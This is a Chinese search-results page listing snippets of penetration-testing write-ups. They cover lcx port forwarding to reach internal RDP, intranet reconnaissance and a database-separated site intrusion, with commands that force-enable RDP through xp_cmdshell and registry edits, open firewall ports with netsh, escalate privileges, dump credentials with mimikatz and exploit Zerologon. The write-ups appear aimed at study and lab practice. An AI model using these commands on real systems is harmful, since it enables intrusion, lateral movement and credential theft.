首页
学习
活动
专区
圈层
工具
发布
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Lcx的多种用法:3个功能+9个参数,你会怎么玩?

    百度一下,原来对面的服务器是在内网中,没有做映射是连接不到的,但是可以借助一个工具进行端口转发来实现连接处于内网的3389服务器,原文链接(百度搜索lcx第一条出现的):http://sec.chinabyte.com...关于 那篇文章大概意思是说连接内网的3389需要4步: 1:确定被控制计算机的内网ip 2:被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”...其实不然,有些特殊情况是可以反过来用的:对面开监听我们执行slave,在对面我们看来是反向连接了,但是在我们看来我们是去正向连接的(就像你直接访问对面的3389),防火墙也不会拦截,这样这可以连接成功,...假设2: 1、 你拿下了两台内网服务器A和B 2、 服务器B不能访问任何机器(自己的话当然可以了),只能让别人访问 遇到这种情况比较好处理,只需参考上面一个假设就能上网了,B开listen ,A...再说一个实例: 有一次渗透中遇到了一个比较蛋疼的情况,有一台服务器我3389上去了但是上面有一个防火墙软件,有个特性:允许连接内网的请求,不能直接访问外网。 我的目的是抓密码。

    3.9K60

    内网穿透访问Windows3389远程桌面:外网电脑直接连接到异地无公网IP主机

    windows系统是个人电脑使用较多的,其中内置自带的远程桌面连接,可以直接访问到另一台windows计算机上进行远程管理操作,默认使用是3389端口,也可以按需修改其他端口。...本文详细介绍了如何在Windows系统中启用并设置远程桌面功能,包括内网电脑的配置、nat123映射软件设置以及在外网电脑上直接连接内网主机远程连接访问的步骤,确保在外网环境下顺利访问3389端口。...-填写内网地址,如是本机远程桌面的,则用127.0.0.1;如是内网另台主机需要被远程桌面的,则对应填写目标固定内网IP。-内网端口,远程桌面系统默认端口为3389,以实际来填写。...附:修改3389默认端口为其他端口号如果是长期提供外网互联网上连接远程桌面使用的,一般建议修改默认的端口号,以提升网络安全,避免机器3389默认端口攻击。...远程桌面的默认3389侦听端口在注册表中指定。 若要更改注册表值,请按照以下方法使用 PowerShell 命令或注册表编辑器进行更改。

    2.6K30

    浅析内网信息收集

    文章前言 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,本篇文章主要对内网中信息收集做一个简单的归纳以及介绍 主机信息 在内网渗透测试中,当我们拿下一台或多台可控的主机...(大多数情况下都是边界主机)时,我们首先要对当前主机的信息进行简易收集,常见的信息包括以下几个方面: 网络配置 通过执行以下命令查看当前机器是否处于内网,以及内网网段是多少,以及DNS地址、域名信息等等...开3389 首先,我们需要确定远程连接的端口(一般是3389),在cmd下使用注册表查询语句,命令如下,得到连接端口为0xd3d,转换后为3389,如下图所示: REG QUERY "HKEY_LOCAL_MACHINE...在 Windows Server 2003 中开启 3389 端口: 首先,查看开启的端口——没有开启3389端口 ?...成功开启3389端口: ? 在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口 查看当前开发端口———未开放3389端口 ?

    1.3K61

    内网信息收集

    文章前言 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,本篇文章主要对内网中信息收集做一个简单的归纳以及介绍 主机信息 在内网渗透测试中,当我们拿下一台或多台可控的主机...(大多数情况下都是边界主机)时,我们首先要对当前主机的信息进行简易收集,常见的信息包括以下几个方面: 网络配置 通过执行以下命令查看当前机器是否处于内网,以及内网网段是多少,以及DNS地址、域名信息等等...开3389 首先,我们需要确定远程连接的端口(一般是3389),在cmd下使用注册表查询语句,命令如下,得到连接端口为0xd3d,转换后为3389,如下图所示: REG QUERY "HKEY_LOCAL_MACHINE...在 Windows Server 2003 中开启 3389 端口: 首先,查看开启的端口——没有开启3389端口 ?...成功开启3389端口: ? 在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口 查看当前开发端口———未开放3389端口 ?

    1.4K40

    实战 | 记一次站库分离的内网渗透

    看到还有一个网卡,是有内网的,加个用户开3389上去看一下: ? ? 看到确实有三个网站在运行,有一个是.net的,但是本机没有sql server,考虑是不是站库分离的情况。 ?...136应该是sql sever ip,先xp_cmdshell强开一波3389: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control...SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389...这里注意,如果ew比较麻烦,不太好上传,那我们可以在msf添加了路由之后,使用auxiliary/server/socks4a这个模块,用msf开个socks代理,这样本机可以通过msf的路由来访问内网...看到一台129,我也不做探测了,看起来就那么一两台,如果要探测内网的话可以proxychains配合nmap或者msf添加路由后本身就可以完成。同样的,用ew做了层代理。

    2.7K30

    记一次站库分离的内网渗透

    直接getsystem是不行的,用suggester来试一下 这里选择用ms16_075来提权 SQL Server Privilege Escalation 看到还有一个网卡,是有内网的,加个用户开...3389上去看一下 看到确实有三个网站在运行,有一个是.net的,但是本机没有sql server,考虑是不是站库分离的情况。...直接aspx马连一家伙 添加一下xp_cmdshell执行命令 136应该是sql sever ip,先xp_cmdshell强开一波3389 reg add "HKEY_LOCAL_MACHINE...这里注意,如果ew比较麻烦,不太好上传,那我们可以在msf添加了路由之后,使用auxiliary/server/socks4a这个模块,用msf开个socks代理,这样本机可以通过msf的路由来访问内网...Intranet Web Information Gathering 看到一台129,我也不做探测了,看起来就那么一两台,如果要探测内网的话可以proxychains配合nmap或者msf添加路由后本身就可以完成

    1.1K10

    靶场学习-从joomla到拿下域控

    /dirty 123 提权成功,使用 firefart 用户进行登录,密码为123 接着进行内网信息搜集,发现机器为双网卡 通过ping发现机器出网 上传 frp 搭建代理隧道 proxifier...,因此寻找其他的方法 接着通过 tasklsit /svc 进行杀软识别,机器上无杀软 由于内网不出网,这里在linux机器上开启http服务,把mimikatz扔上去 然后使用powershell...REG_DWORD /d 0 /f 修改完注册表的话需要重启,但重启之后上面登着的进程也没了,意义不大 这里初步判断192.168.93.10为域控,尝试使用CVE-2020-1472,由于代理不太稳定,靶机直接开3389.../t REG_DWORD /d 00000000 /f #执行以下命令操作注册表来关闭机器3389远程桌面服务 REG ADD HKLM\SYSTEM\CurrentControlSet\Control.../t REG_DWORD /d 11111111 /f #使用以下命令添加防火墙放行策略 netsh firewall add portopening protocol = TCP port = 3389

    1.6K20

    内网渗透 | 手把手教你如何进行内网渗透

    get shell 到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。 ---- 0x02 跳板及内网探测 现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。...admin 123456 这个cms呢,后台可以getshell,我是被卡在burpsuite抓包上面,开了burpsuite总是无法访问,后来才发现,在burpsuite里面设置了socks代理就没必要再开proxifier...第二种方法 如上配置后,就不需要再开socks代理工具了,否则会出现问题。 ? 在后台添加php允许上传,再去上传点,不要传php因为判断了Content-Type。 ?...可以看到开了135、445、3389,啥都不说了,永恒之蓝打一波。 0x4 第三层内网渗透 ? ?...3389 至此呢,本次内网渗透就完成了。

    10.6K22
    领券